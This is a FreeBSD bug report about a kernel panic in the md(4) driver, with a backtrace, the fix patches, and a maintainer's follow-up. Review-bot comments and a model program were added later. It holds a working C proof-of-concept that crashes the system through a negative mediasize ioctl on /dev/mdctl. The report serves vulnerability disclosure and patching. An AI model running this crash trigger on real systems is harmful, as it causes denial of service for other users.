From nobody@FreeBSD.org  Tue Jul 17 17:50:26 2012
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52])
	by hub.freebsd.org (Postfix) with ESMTP id 214D21065672
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:26 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22])
	by mx1.freebsd.org (Postfix) with ESMTP id 0C6B58FC17
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:26 +0000 (UTC)
Received: from red.freebsd.org (localhost [127.0.0.1])
	by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q6HHoP5A098958
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:25 GMT
	(envelope-from nobody@red.freebsd.org)
Received: (from nobody@localhost)
	by red.freebsd.org (8.14.4/8.14.4/Submit) id q6HHoPQ2098957;
	Tue, 17 Jul 2012 17:50:25 GMT
	(envelope-from nobody)
Message-Id: <201207171750.q6HHoPQ2098957@red.freebsd.org>
Date: Tue, 17 Jul 2012 17:50:25 GMT
From: Filip Palian <filip.palian@pjwstk.edu.pl>
To: freebsd-gnats-submit@FreeBSD.org
Subject: System crash via ioctl() on mdctl.
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         169947
>Category:       kern
>Synopsis:       [md] [patch] System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    jh
>State:          patched
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 17 18:00:22 UTC 2012
>Closed-Date:    
>Last-Modified:  Thu Aug 02 15:17:24 UTC 2012
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also within a jail, if the device is provided there by devfs(.rules)) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occurs in the function swap_release_by_cred() (swap_pager.c:285), called from vm_object_deallocate() (md.c:1119). Some detailed information is included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
.
panic: swap_reserved < decr
.
Unread portion of the kernel message buffer:

panic: swap_reserved < decr
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b1d7 at kdb_backtrace+0x47
#1 0xc0a18737 at panic+0x117
#2 0xc0c6d147 at swap_release_by_cred+0x97    <--- paniced here
#3 0xc0c85684 at vm_object_destroy+0xd4
#4 0xc0c87825 at vm_object_terminate+0x2c5
#5 0xc0c880a7 at vm_object_deallocate+0x877
#6 0xc0c7da51 at vm_map_entry_deallocate+0x21
#7 0xc0c7daba at vm_map_process_deferred+0x2a
#8 0xc0c7ebfa at _vm_map_unlock+0x4a
#9 0xc0c7f2eb at vm_map_remove+0x6b
#10 0xc0c82543 at vmspace_exit+0xc3
#11 0xc09e9038 at exit1+0x6f8
#12 0xc09e9d7d at sys_sys_exit+0x1d
#13 0xc0d4c275 at syscall+0x355
#14 0xc0d35a51 at Xint0x80_syscall+0x21
Uptime: 2h36m43s
Physical memory: 1383 MB
Dumping 80 MB: 65 49 33 17 1
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
The "mediasize" member of the "md_s" structure should be of an unsigned type. Currently it is of type off_t, which is "typedef long __int64_t".

An alternative solution would be to add the following sanity condition at md.c:1091 (not mentioning the author's comment):

-- cut --
--- dev/md/md.c.old     2012-07-15 21:32:40.000000000 +0200
+++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200
@@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md
         * Range check.  Disallow negative sizes or any size less then the
         * size of a page.  Then round to a page.
         */
-       if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
+       if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
                return (EDOM);

        /*
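Review bot: the change from `== 0` to `<= 0` is needed because C's `%` keeps the sign of the dividend, so a negative mediasize that is a multiple of PAGE_SIZE (the attached test program's -1000000000000 is one) satisfies `(sc->mediasize % PAGE_SIZE) == 0` and slips past the old check into the swap reservation; it also makes the code match the comment directly above it, which already promises to "Disallow negative sizes". Note that this guard lives in mdcreate_swap() only, so a negative size submitted with another md_type (the test program uses MD_PRELOAD) is not covered by this patch; a type-independent check at the ioctl entry point would close that as well.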
-- cut --
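A userland model of the range checks at issue, added here as an illustration and not code from the FreeBSD tree: it mirrors the mdcreate_swap() condition before and after the patch above, plus a type-independent sectorsize guard in the spirit of the one r238991 later adds at the ioctl entry point. The PAGE_SIZE, DEV_BSIZE and MAXPHYS values (4096, 512, 128 KiB) are assumptions, and off_t is modelled as int64_t.

```c
/* Model of the md(4) attach range checks in this PR (added example, not FreeBSD code).
 * Assumes off_t is signed 64-bit, PAGE_SIZE 4096, DEV_BSIZE 512, MAXPHYS 128 KiB. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

typedef int64_t model_off_t;   /* stands in for the kernel's off_t */
#define MODEL_PAGE_SIZE 4096
#define MODEL_DEV_BSIZE 512
#define MODEL_MAXPHYS   (128 * 1024)

/* Pre-patch mdcreate_swap() check: rejects zero and unaligned sizes only. C's %
 * keeps the dividend's sign, so a negative multiple of PAGE_SIZE yields 0 and passes. */
int swap_check_old(model_off_t mediasize)
{
	if (mediasize == 0 || (mediasize % MODEL_PAGE_SIZE) != 0)
		return (EDOM);
	return (0);
}

/* Patched check: additionally rejects negative sizes. */
int swap_check_new(model_off_t mediasize)
{
	if (mediasize <= 0 || (mediasize % MODEL_PAGE_SIZE) != 0)
		return (EDOM);
	return (0);
}

/* Type-independent guard modelled on r238991's ioctl entry check. sectsize widens to
 * the signed 64-bit off_t, so a negative mediasize is less than any sector size. */
int attach_check(model_off_t mediasize, unsigned sectorsize)
{
	unsigned sectsize = sectorsize == 0 ? MODEL_DEV_BSIZE : sectorsize;
	if (sectsize > MODEL_MAXPHYS || mediasize < (model_off_t)sectsize)
		return (EINVAL);
	return (0);
}

int main(void)
{
	/* Constructed sample sizes; the first is the value used by the attached test program. */
	model_off_t sizes[] = { -1000000000000LL, -4096, 0, 4095, 4096, 1 << 20 };
	for (size_t i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++)
		printf("%15lld old=%d new=%d attach=%d\n", (long long)sizes[i],
		    swap_check_old(sizes[i]), swap_check_new(sizes[i]), attach_check(sizes[i], 0));
	return (0);
}
```

The first row of the output shows the bug: the old check returns 0 (accepted) for -1000000000000, while both the patched check and the entry-point guard refuse it.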

To prevent evil users from doing bad things, administrators should ensure that the "/dev/mdctl" permissions are +rw (600) for root only.

For servers where jails are provided to untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.

Patch attached with submission follows:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>


int main(void)
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	/* Zero the request so fields the test does not set are not passed uninitialized. */
	memset(&s, 0, sizeof(s));
	s.md_version = MDIOVERSION;
	// s.md_type = MD_SWAP;
	s.md_type = MD_PRELOAD;
	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;

	// md_mediasize is off_t: typedef long long = int64, so a negative size is representable
	//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
	s.md_mediasize = -1000000000000;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(1);
	}

	/* Read permission on the control device is all that is needed for the ioctl. */
	f = open("/dev/mdctl", O_RDONLY, 0);
	if (f < 0) {
		printf("open(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(1);
	}

	printf("say goodnight...\n");

	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));

	printf("no +r no fun\n");

	close(f);
	exit(0);
}

>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->open 
State-Changed-By: linimon 
State-Changed-When: Tue Jul 17 21:45:43 UTC 2012 
State-Changed-Why:  
reclassify. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 

From: Jaakko Heinonen <jh@FreeBSD.org>
To: Filip Palian <filip.palian@pjwstk.edu.pl>
Cc: bug-followup@FreeBSD.org
Subject: Re: misc/169947: System crash via ioctl() on mdctl.
Date: Wed, 18 Jul 2012 16:33:39 +0300

 On 2012-07-17, Filip Palian wrote:
 > User who has read permission on "/dev/mdctl" is able to crash the
 > system (also within the jail if only provided by devfs(.rules)) via
 > ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occures
 > in function swap_release_by_cred() (swap_pager.c:285) called in
 > vm_object_deallocate() (md.c:1119). Some detailed information included
 > below.
 > 
 > Patch attached with submission follows:
 > 
 > #include <stdio.h>
 > #include <stdlib.h>
 
 I couldn't reproduce the problem with your test program on current or
 stable/9:
 
 $ ./mdtest.orig 
 say goodnight...
 ioctl(MDIOCATTACH) failed: Invalid argument
 no +r no fun
 
 I tried to modify the test program with the following changes but still no
 success.
 
 %%%
 --- mdtest.c	2012-07-18 16:13:34.000000000 +0300
 +++ mdtest.c	2012-07-18 16:17:05.000000000 +0300
 @@ -21,7 +21,8 @@
  	s.md_version = MDIOVERSION;
  	// s.md_type = MD_SWAP;
  	s.md_type = MD_PRELOAD;
 -	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
 +	s.md_base = -1;
 +	s.md_options = MD_AUTOUNIT;
  
  	// typedef long long = int64 = off_t
  	//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
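Review bot: the modified test still keeps `s.md_type = MD_PRELOAD` (unchanged context line), so the attach never reaches the mdcreate_swap() range check that the submitter's patch targets, and the negative `s.md_mediasize` further down is left as is. Dropping `MD_CLUSTER | MD_COMPRESS` and adding `s.md_base = -1` alters the preload attach parameters rather than anything on the size-check path, which is consistent with the device simply being created; this variant therefore does not exercise the condition the proposed patch changes.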
 %%%
 
 
 $ ./mdtest 
 say goodnight...
 no +r no fun
 
 A new md device is successfully created.
 
 Are you sure that you attached the correct test program and you didn't
 have local patches applied to your kernel?
 
 -- 
 Jaakko
Responsible-Changed-From-To: freebsd-bugs->jh 
Responsible-Changed-By: jh 
Responsible-Changed-When: Wed Jul 18 13:58:57 UTC 2012 
Responsible-Changed-Why:  
Track. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 

From: dfilter@FreeBSD.ORG (dfilter service)
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: kern/169947: commit references a PR
Date: Thu,  2 Aug 2012 15:05:49 +0000 (UTC)

 Author: jh
 Date: Thu Aug  2 15:05:34 2012
 New Revision: 238991
 URL: http://svn.freebsd.org/changeset/base/238991
 
 Log:
   Disallow sectorsize larger than MAXPHYS and mediasize smaller than
   sectorsize.
   
   PR:		169947
   Submitted by:	Filip Palian (original version)
   Reviewed by:	kib
 
 Modified:
   head/sys/dev/md/md.c
 
 Modified: head/sys/dev/md/md.c
 ==============================================================================
 --- head/sys/dev/md/md.c	Thu Aug  2 13:57:49 2012	(r238990)
 +++ head/sys/dev/md/md.c	Thu Aug  2 15:05:34 2012	(r238991)
 @@ -1090,7 +1090,7 @@ mdresize(struct md_s *sc, struct md_ioct
  	case MD_VNODE:
  		break;
  	case MD_SWAP:
 -		if (mdio->md_mediasize == 0 ||
 +		if (mdio->md_mediasize <= 0 ||
  		    (mdio->md_mediasize % PAGE_SIZE) != 0)
  			return (EDOM);
  		oldpages = OFF_TO_IDX(round_page(sc->mediasize));
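Review bot: `<= 0` here closes the same gap as in mdcreate_swap(): with a signed off_t, a negative md_mediasize that is a multiple of PAGE_SIZE passes `(md_mediasize % PAGE_SIZE) != 0`, so the old `== 0` test caught only the zero case. The check is reached only for MD_SWAP (MD_VNODE just breaks), so the resize path for other types depends on the new `md_mediasize < sc->sectorsize` guard added in the caller in the last hunk; a short comment pointing at that guard would make the division of responsibility clear.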
 @@ -1148,7 +1148,7 @@ mdcreate_swap(struct md_s *sc, struct md
  	 * Range check.  Disallow negative sizes or any size less then the
  	 * size of a page.  Then round to a page.
  	 */
 -	if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
 +	if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
  		return (EDOM);
  
  	/*
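Review bot: this is the submitter's original patch applied verbatim, and the comment above ("Disallow negative sizes") and the condition now agree. Since this hunk and the mdresize() hunk repeat the same `<= 0 || (... % PAGE_SIZE) != 0` test, a small shared helper would keep the two from drifting apart again.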
 @@ -1189,6 +1189,7 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  	struct md_ioctl *mdio;
  	struct md_s *sc;
  	int error, i;
 +	unsigned sectsize;
  
  	if (md_debug)
  		printf("mdctlioctl(%s %lx %p %x %p)\n",
 @@ -1217,6 +1218,12 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		default:
  			return (EINVAL);
  		}
 +		if (mdio->md_sectorsize == 0)
 +			sectsize = DEV_BSIZE;
 +		else
 +			sectsize = mdio->md_sectorsize;
 +		if (sectsize > MAXPHYS || mdio->md_mediasize < sectsize)
 +			return (EINVAL);
  		if (mdio->md_options & MD_AUTOUNIT)
  			sc = mdnew(-1, &error, mdio->md_type);
  		else {
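Review bot: this is the check that actually covers every md_type rather than just MD_SWAP. `mdio->md_mediasize < sectsize` compares a signed 64-bit off_t with an `unsigned`; under the usual arithmetic conversions sectsize is widened to off_t (which can represent every unsigned value), so a negative md_mediasize compares less than sectsize and is rejected with EINVAL before any allocation or swap reservation. That the comparison is correct only because off_t is 64-bit deserves a one-line comment, since a reader skimming the signed/unsigned mix may take it for a bug.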
 @@ -1229,10 +1236,7 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		if (mdio->md_options & MD_AUTOUNIT)
  			mdio->md_unit = sc->unit;
  		sc->mediasize = mdio->md_mediasize;
 -		if (mdio->md_sectorsize == 0)
 -			sc->sectorsize = DEV_BSIZE;
 -		else
 -			sc->sectorsize = mdio->md_sectorsize;
 +		sc->sectorsize = sectsize;
  		error = EDOOFUS;
  		switch (sc->type) {
  		case MD_MALLOC:
 @@ -1282,6 +1286,8 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		sc = mdfind(mdio->md_unit);
  		if (sc == NULL)
  			return (ENOENT);
 +		if (mdio->md_mediasize < sc->sectorsize)
 +			return (EINVAL);
  		if (mdio->md_mediasize < sc->mediasize &&
  		    !(sc->flags & MD_FORCE) &&
  		    !(mdio->md_options & MD_FORCE))
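Review bot: the resize path now rejects a requested md_mediasize smaller than the existing sectorsize (and therefore any negative value) before the MD_FORCE shrink check runs, which matches the attach-side guard. The error code is EINVAL here but EDOM in mdresize() for the same class of bad size; picking one would make the interface easier for callers to handle.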
 
State-Changed-From-To: open->patched 
State-Changed-By: jh 
State-Changed-When: Thu Aug 2 15:16:47 UTC 2012 
State-Changed-Why:  
Patched in head (r238991). Thanks! 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 
>Unformatted:
